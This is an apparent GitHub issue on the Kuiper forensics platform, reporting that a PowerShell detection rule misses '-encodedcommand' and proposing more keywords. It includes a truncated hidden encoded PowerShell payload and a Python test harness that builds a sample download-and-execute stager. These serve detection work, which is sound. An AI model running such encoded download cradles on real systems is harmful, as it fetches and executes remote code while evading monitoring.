DFIRKuiper / Kuiper

Digital Forensics Investigation Platform


"Powershell_Execution" rule does not catch "-encodedcommand"

congtrung2k1 opened this issue · comments

In the Powershell_Execution rule of ./app/utils/Dracarys/Rhaegal/rules/malicious/rules.gh, the only condition is to catch text in Data like below:

```yaml
Event.EventData.Data.#text:
- "downloadstring"
- "downloadfile"
- "iex"
- "* -e *"
```

And there is another way to encode the command: -encodedcommand

Suggestion: add the string:

```yaml
- "* -encodedcommand *"
```

More strings should be added:

```yaml
- "FromBase64String"
- "* -File "
- "-ExecutionPolicy ByPass *"
```

Here is an example payload:

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADQAZwBFAEsASQBU
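As an added example (not part of the issue, and not Kuiper's or Rhaegal's own code), the matcher below runs the quoted rule terms and the suggested additions over constructed Event.EventData.Data values. It assumes a Rhaegal-like matcher that is case-insensitive, treats a bare term as a substring test and a term containing `*` as a glob over the whole value; the suggested terms are therefore written here with leading and trailing `*`, which fnmatch would otherwise anchor to the start or end of the value. It also goes a step beyond the suggested strings: powershell.exe accepts abbreviated switches (`-e`, `-ec`, `-enc`, ...), so the example recognises any prefix of `-EncodedCommand` and decodes the base64/UTF-16LE payload so that the existing `iex` and `downloadstring` terms can match inside it. The sample command lines, the stager they carry and the `/` switch prefix handling are assumptions made for the example.

```python
import base64
import fnmatch

# Terms quoted in the issue from the Powershell_Execution rule.
ORIGINAL_PATTERNS = ["downloadstring", "downloadfile", "iex", "* -e *"]

# Terms the issue proposes adding, with leading/trailing "*" supplied here
# (assumption: un-starred globs would anchor to the start/end of the value).
SUGGESTED_PATTERNS = [
    "*-encodedcommand*",
    "*FromBase64String*",
    "* -File *",
    "* -ExecutionPolicy ByPass *",
]


def matches(value, patterns):
    """Return the patterns that hit `value`, in pattern order.

    Stand-in for Rhaegal's matcher, assumed case-insensitive: a term without
    wildcards is a substring test, a term with "*" or "?" is an fnmatch glob
    over the whole value.
    """
    v = value.lower()
    hits = []
    for p in patterns:
        pl = p.lower()
        if any(c in pl for c in "*?"):
            if fnmatch.fnmatchcase(v, pl):
                hits.append(p)
        elif pl in v:
            hits.append(p)
    return hits


def encoded_command_switch(token):
    """True if `token` is a spelling powershell.exe accepts for -EncodedCommand.

    powershell.exe takes any prefix of the switch name (-e, -en, -enc, ...)
    plus the alias -ec; "/" is assumed to be accepted as a switch prefix too.
    -ExecutionPolicy and its prefixes (-ex, -ep) are not prefixes of
    "encodedcommand", so they are rejected.
    """
    if not token or token[0] not in "-/":
        return False
    t = token[1:].lower()
    return t == "ec" or (t.startswith("e") and "encodedcommand".startswith(t))


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries -EncodedCommand, else None.

    The switch argument is base64 of the script text encoded as UTF-16LE.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if encoded_command_switch(tok):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(cmdline, patterns):
    """Match the raw command line and, if present, the decoded payload too."""
    hits = matches(cmdline, patterns)
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits += ["decoded:" + p for p in matches(decoded, patterns)]
    return hits


def encode(script):
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a download-cradle stager and four ways of launching it.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLES = {
    "plain": 'powershell -nop -w hidden -c "' + STAGER + '"',
    "short": "powershell -nop -w hidden -e " + encode(STAGER),
    "long": "powershell -nop -w hidden -encodedcommand " + encode(STAGER),
    "abbrev": "powershell -nop -w hidden -enc " + encode(STAGER),
}


def scan(samples, patterns):
    """Return {sample name: hits} for every constructed command line."""
    return {name: analyze(cmd, patterns) for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, hits in scan(SAMPLES, ORIGINAL_PATTERNS + SUGGESTED_PATTERNS).items():
        print(f"{name:7s} {hits}")
```

Running the four samples shows the gap the issue reports: the `-e` form is caught by `* -e *`, `-encodedcommand` only by the added term, and `-enc` by neither list until the payload is decoded and the existing `iex` and `downloadstring` terms see the plaintext.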

the embedded Rhaegal is not enough to be honest, there are a lot of options not included, but it is a sample that helps to create more custom rules